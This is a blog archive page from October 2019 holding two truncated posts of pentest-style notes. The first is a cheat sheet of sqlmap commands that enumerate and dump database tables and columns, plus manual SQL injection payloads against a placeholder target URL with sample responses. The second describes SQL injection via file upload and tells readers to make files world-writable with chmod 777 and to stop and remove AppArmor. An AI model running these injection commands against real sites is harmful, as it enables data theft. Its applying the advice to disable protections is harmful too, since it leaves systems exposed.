Posts

Showing posts from October, 2019

SQLMAP and Manual SQLi Command

A-SQLMAP Command- Get Database- sqlmap.py -u "website" -- dbs --batch Get Tables- sqlmap.py -u "website" -- tables -D acuart Get Columns- sqlmap.py -u "website" -- columns -T users -D acuart Dump Columns- sqlmap.py -u "website" -D acuart -T users -C (put column name (a,b,c,d)) --dump Safe SQL Map- sqlmap.py -r 1.txt --force-ssl --level=1 --risk=1 --threads=1 --dbms="Postgresql" --technique=BEUSTQ Dump All in One- sqlmap.py -u "website" -D acuart --dump-all B-Manual SQLi Command- Check for SQLi- 1-http://Target-IP/1.php?f ormat1=json&token1=123456789' {"status":401, dta":"No Data found with this provided token"} Fixing the Query- 1- http://Target-IP/1.php? format1=json&token1=123456789'+or'1'='1--+ {"status":200} Getting the no of column with Order By- 2-http://Target-IP/1.php? format1=json&token1=123456789'+order+by+...

SQL Injection With File Upload

SQL Injection With File Upload- 1-chmod -R 777 (for vuln app only, also check  AppArmor  module ) ************************** Disable and remove AppArmor on Ubuntu based Linux distributions- AppArmor is security Linux kernel module similar to the SELinux but it's supposed to be easier to setup and maintain. There are many reasons for you to disable it, primary one is that its security features can get in the way of legitimate applications operation. In this article I am going to show you how to disable AppArmor from your Ubuntu based Linux distribution. 1-The thing is actually very simple. First we stop apparmor service using following command: sudo /etc/init.d/apparmor stop 2-Next thing to do is to disable this service from starting at boot time using Debian update-rc.d tool: sudo update-rc.d -f apparmor remove to check with file upload with sqli- Now, give the neccessary read, write and execute permissions. So, there could be no error while performing operati...